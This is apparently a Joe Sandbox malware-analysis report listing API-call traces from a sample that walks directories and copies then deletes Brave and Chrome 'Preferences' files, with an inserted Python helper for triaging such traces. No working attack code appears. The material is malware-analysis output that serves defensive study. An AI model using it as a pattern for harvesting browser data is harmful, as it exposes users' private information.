                                    • lstrlen.KERNEL32(00F91794), ref: 00F61C7F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61CA2
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F61CAE
                                    • lstrlen.KERNEL32(?), ref: 00F61CBB
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61CDB
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F61CE9
                                    • lstrlen.KERNEL32(00F91794), ref: 00F61CF4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61D14
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F61D20
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61D46
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F61D51
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61D7D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61DE0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F61DEB
                                    • lstrlen.KERNEL32(00F91794), ref: 00F61DF6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61E19
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F61E25
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61E4B
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F61E56
                                    • lstrlen.KERNEL32(00F91794), ref: 00F61E61
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61E81
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F61E8D
                                    • lstrlen.KERNEL32(?), ref: 00F61E9A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61EBA
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F61EC8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61EF4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61F3E
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00F61F45
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F61F9F
                                    • lstrlen.KERNEL32(00A99108), ref: 00F61FAE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61FDB
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F61FE3
                                    • lstrlen.KERNEL32(00F91794), ref: 00F61FEE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6200E
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6201A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F62042
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6204D
                                    • lstrlen.KERNEL32(00F91794), ref: 00F62058
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F62075
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F62081
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                    • String ID: \*.*
                                    • API String ID: 4127656590-1173974218
                                    • Opcode ID: eccc622fff241ec128d229285526fb22cb1c697ef9936855a2fc38562e1aacc0
                                    • Instruction ID: 0f5bbd1cddfc4fd9a2d42bcb0bd587309b74339a852770a6eb51d981d84250ae
                                    • Opcode Fuzzy Hash: eccc622fff241ec128d229285526fb22cb1c697ef9936855a2fc38562e1aacc0
                                    • Instruction Fuzzy Hash: A592C371D0161A9BDB71EFA4DD89AAE77B9BF44314F080038F825A7205DB38DD41EBA1
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6DBC1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DBE4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6DBEF
                                    • lstrlen.KERNEL32(00F94CA8), ref: 00F6DBFA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DC17
                                    • lstrcat.KERNEL32(00000000,00F94CA8), ref: 00F6DC23
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DC4C
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6DC8F
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6DCBF
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00F6DCD0
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F6DCF0
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F6DD0A
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F6DD1D
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6DD47
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DD70
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6DD7B
                                    • lstrlen.KERNEL32(00F91794), ref: 00F6DD86
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DDA3
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6DDAF
                                    • lstrlen.KERNEL32(?), ref: 00F6DDBC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DDDF
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F6DDED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DE19
                                    • lstrlen.KERNEL32(00F91794), ref: 00F6DE3D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6DE6F
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6DE7B
                                    • lstrlen.KERNEL32(00A98F68), ref: 00F6DE8A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DEB0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6DEBB
                                    • lstrlen.KERNEL32(00F91794), ref: 00F6DEC6
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6DEE6
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6DEF2
                                    • lstrlen.KERNEL32(00A991B8), ref: 00F6DF01
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DF27
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6DF32
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DF5E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DFA5
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6DFB1
                                    • lstrlen.KERNEL32(00A98F68), ref: 00F6DFC0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DFE9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6DFF4
                                    • lstrlen.KERNEL32(00F91794), ref: 00F6DFFF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E022
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6E02E
                                    • lstrlen.KERNEL32(00A991B8), ref: 00F6E03D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E063
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6E06E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E09A
                                    • StrCmpCA.SHLWAPI(?,Brave), ref: 00F6E0CD
                                    • StrCmpCA.SHLWAPI(?,Preferences), ref: 00F6E0E7
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6E11F
                                    • lstrlen.KERNEL32(00A9CF08), ref: 00F6E12E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E155
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F6E15D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E19F
                                    • lstrcat.KERNEL32(00000000), ref: 00F6E1A9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E1D0
                                    • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00F6E1F9
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6E22F
                                    • lstrlen.KERNEL32(00A99108), ref: 00F6E23D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E261
                                    • lstrcat.KERNEL32(00000000,00A99108), ref: 00F6E269
                                    • lstrlen.KERNEL32(\Brave\Preferences), ref: 00F6E274
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E29B
                                    • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 00F6E2A7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E2CF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E30F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E349
                                    • DeleteFileA.KERNEL32(?), ref: 00F6E381
                                    • StrCmpCA.SHLWAPI(?,00A9D1D8), ref: 00F6E3AB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E3F4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E41C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E445
                                    • StrCmpCA.SHLWAPI(?,00A991B8), ref: 00F6E468
                                    • StrCmpCA.SHLWAPI(?,00A98F68), ref: 00F6E47D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E4D9
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00F6E4E0
                                    • StrCmpCA.SHLWAPI(?,00A9D118), ref: 00F6E58E
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6E5C4
                                    • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00F6E639
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E678
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E6A1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E6C7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E70E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E737
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E75C
                                    • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 00F6E776
                                    • DeleteFileA.KERNEL32(?), ref: 00F6E7D2
                                    • StrCmpCA.SHLWAPI(?,00A99168), ref: 00F6E7FC
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E88C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E8B5
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E8EE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E916
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E952
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 2635522530-726946144
                                    • Opcode ID: e17171493be007febaffda059b389ff8ee962de18eedfde87810657cb7286df6
                                    • Instruction ID: 66037105ab1233c5931ac438aedf915f5009172258301ba4d3d42291efe8f5ce
                                    • Opcode Fuzzy Hash: e17171493be007febaffda059b389ff8ee962de18eedfde87810657cb7286df6
                                    • Instruction Fuzzy Hash: E092A171E1160A9BCB24EFB4DC89AAE77B9BF44314F084528F826D7245DB38DC45EB90
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F718D2
                                    • lstrlen.KERNEL32(\*.*), ref: 00F718DD
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F718FF
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 00F7190B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71932
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00F71947
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F71967
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F71981
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F719BF
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F719F2
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F71A1A
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F71A25
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71A4C
                                    • lstrlen.KERNEL32(00F91794), ref: 00F71A5E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71A80
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F71A8C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71AB4
                                    • lstrlen.KERNEL32(?), ref: 00F71AC8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71AE5
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F71AF3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71B19
                                    • lstrlen.KERNEL32(00A99288), ref: 00F71B2F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71B59
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F71B64
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71B8F
                                    • lstrlen.KERNEL32(00F91794), ref: 00F71BA1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71BC3
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F71BCF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71BF8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71C25
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F71C30
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71C57
                                    • lstrlen.KERNEL32(00F91794), ref: 00F71C69
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71C8B
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F71C97
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71CC0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71CEF
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F71CFA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71D21
                                    • lstrlen.KERNEL32(00F91794), ref: 00F71D33
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71D55
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F71D61
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71D8A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71DB9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F71DC4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71DED
                                    • lstrlen.KERNEL32(00F91794), ref: 00F71E19
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71E36
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F71E42
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71E68
                                    • lstrlen.KERNEL32(00A9CFB0), ref: 00F71E7E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71EB2
                                    • lstrlen.KERNEL32(00F91794), ref: 00F71EC6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71EE3
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F71EEF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71F15
                                    • lstrlen.KERNEL32(00A9DB90), ref: 00F71F2B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71F5F
                                    • lstrlen.KERNEL32(00F91794), ref: 00F71F73
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71F90
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F71F9C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71FC2
                                    • lstrlen.KERNEL32(00A8BA40), ref: 00F71FD8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F72000
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F7200B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F72036
                                    • lstrlen.KERNEL32(00F91794), ref: 00F72048
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F72067
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F72073
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F72098
                                    • lstrlen.KERNEL32(?), ref: 00F720AC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F720D0
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F720DE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F72103
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7213F
                                    • lstrlen.KERNEL32(00A9CF08), ref: 00F7214E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F72176
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F72181
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                    • String ID: \*.*
                                    • API String ID: 712834838-1173974218
                                    • Opcode ID: dcb7fa3508c6ecaf9e0ab122c0e46f7b573239616f92330ade5533f140c946af
                                    • Instruction ID: 3feba693fdfa093bd8d37d5eb1d37067e07bb3c69852f66d3ee23ee3773f1de4
                                    • Opcode Fuzzy Hash: dcb7fa3508c6ecaf9e0ab122c0e46f7b573239616f92330ade5533f140c946af
                                    • Instruction Fuzzy Hash: AF62E93090161A9BCB31EFA8CD49AAF77B9BF44710F044039F82993245DB78DD45EBA2
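The function listings above (the Brave / Google Chrome "Preferences" routine with its CopyFileA and DeleteFileA calls, and the FindFirstFileA / FindNextFileA / FindClose directory walks around it) are printed by the Joe Sandbox IDA plugin as raw API-call sequences. The Python helper below is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in exactly the form shown in these listings, separates arguments the sandbox resolved to string literals from unresolved 8-hex-digit values and the "?" placeholder, and flags two behaviours a triage analyst reads out of such a trace: a Win32 directory enumeration loop (FindFirstFileA before FindClose in the same function) and a copy-then-delete of a target file, noting whether CopyFileA was called with bFailIfExists set to TRUE (the third argument, 00000001, in the listing). The sample trace is constructed by copying a subset of lines from this page's listings (calls from two different functions are combined so that the enumeration tail is present); the names parse_trace, summarize, literal_strings and Call are my own.

```python
import re
from collections import Counter
from dataclasses import dataclass

# One API-trace line in the form the Joe Sandbox IDA plugin prints it, e.g.
#   • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6DBC1
#   • wsprintfA.USER32 ref: 00F7392C        (no argument list printed)
LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>[A-Za-z_]\w*)"      # API name
    r"(?:\.(?P<module>\w+))?"              # .KERNEL32 / .SHLWAPI / .USER32
    r"(?:\((?P<args>[^)]*)\))?"            # optional (arg,arg,...)
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass
class Call:
    api: str
    module: str
    args: tuple
    ref: int  # address of the call site


def parse_trace(text):
    """Parse a block of report text into Call records; non-call lines
    (headings, 'Memory Dump Source' metadata, ...) are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(Call(m.group("api"), m.group("module") or "",
                          args, int(m.group("ref"), 16)))
    return calls


def literal_strings(calls):
    """Arguments the sandbox resolved to a string, in first-seen order.
    8-hex-digit values are unresolved pointers/immediates and '?' is the
    plugin's placeholder for a value it could not recover."""
    seen = []
    for c in calls:
        for a in c.args:
            if a != "?" and not HEX8_RE.match(a) and a not in seen:
                seen.append(a)
    return seen


def summarize(calls):
    names = [c.api for c in calls]
    counts = Counter(names)
    # Win32 directory walk: FindFirstFileA ... FindNextFileA ... FindClose,
    # in that order within the same function.
    first = names.index("FindFirstFileA") if "FindFirstFileA" in counts else -1
    close = names.index("FindClose") if "FindClose" in counts else -1
    # CopyFileA(src, dst, bFailIfExists): a third argument of 1 means TRUE,
    # i.e. an existing destination makes the copy fail instead of overwriting.
    copies = [c for c in calls if c.api == "CopyFileA"]
    fail_if_exists = (all(c.args[-1:] == ("00000001",) for c in copies)
                      if copies else None)
    building = counts["lstrcpy"] + counts["lstrcat"] + counts["lstrlen"]
    return {
        "calls": len(calls),
        "counts": dict(counts),
        # share of calls spent assembling paths/strings piece by piece
        "string_build_ratio": round(building / len(calls), 2) if calls else 0.0,
        "enumerates_directory": first != -1 and close > first,
        "copy_then_delete": bool(copies) and "DeleteFileA" in counts,
        "copy_fail_if_exists": fail_if_exists,
        "literals": literal_strings(calls),
    }


# Constructed sample: lines copied from the listings on this page, with the
# FindNextFileA/FindClose tail of a later function appended.
SAMPLE_TRACE = r"""
• lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6DBC1
• lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DBE4
• lstrcat.KERNEL32(00000000,00000000), ref: 00F6DBEF
• lstrlen.KERNEL32(00F94CA8), ref: 00F6DBFA
• FindFirstFileA.KERNEL32(00000000,?), ref: 00F6DCD0
• StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F6DCF0
• StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F6DD0A
• StrCmpCA.SHLWAPI(?,Brave), ref: 00F6E0CD
• StrCmpCA.SHLWAPI(?,Preferences), ref: 00F6E0E7
• lstrcat.KERNEL32(00000000), ref: 00F6E1A9
• CopyFileA.KERNEL32(00000000,?,00000001), ref: 00F6E1F9
• lstrlen.KERNEL32(\Brave\Preferences), ref: 00F6E274
• DeleteFileA.KERNEL32(?), ref: 00F6E381
• GetFileAttributesA.KERNEL32(00000000), ref: 00F6E4E0
• StrCmpCA.SHLWAPI(?,Google Chrome), ref: 00F6E776
• wsprintfA.USER32 ref: 00F7392C
• FindNextFileA.KERNEL32(00000000,?), ref: 00F742D9
• FindClose.KERNEL32(00000000), ref: 00F742E8
"""

if __name__ == "__main__":
    from pprint import pprint
    pprint(summarize(parse_trace(SAMPLE_TRACE)))
```

The 8-hex-digit arguments are left unresolved on purpose: the plugin prints them when it could not read the pointed-to string, so values such as 00F917A0 and 00F917A4 (compared against every directory entry right after FindFirstFileA) should be resolved from the memory dump rather than guessed. On a full report the helper is meant to be run once per function block, so the FindFirstFileA-before-FindClose check does not span unrelated functions.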
                                    APIs
                                    • wsprintfA.USER32 ref: 00F7392C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00F73943
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F7396C
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F73986
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F739BF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F739E7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F739F2
                                    • lstrlen.KERNEL32(00F91794), ref: 00F739FD
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73A1A
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F73A26
                                    • lstrlen.KERNEL32(?), ref: 00F73A33
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73A53
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F73A61
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73A8A
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F73ACE
                                    • lstrlen.KERNEL32(?), ref: 00F73AD8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73B05
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F73B10
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73B36
                                    • lstrlen.KERNEL32(00F91794), ref: 00F73B48
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73B6A
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F73B76
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73B9E
                                    • lstrlen.KERNEL32(?), ref: 00F73BB2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73BD2
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F73BE0
                                    • lstrlen.KERNEL32(00A99108), ref: 00F73C0B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73C31
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F73C3C
                                    • lstrlen.KERNEL32(00A99288), ref: 00F73C5E
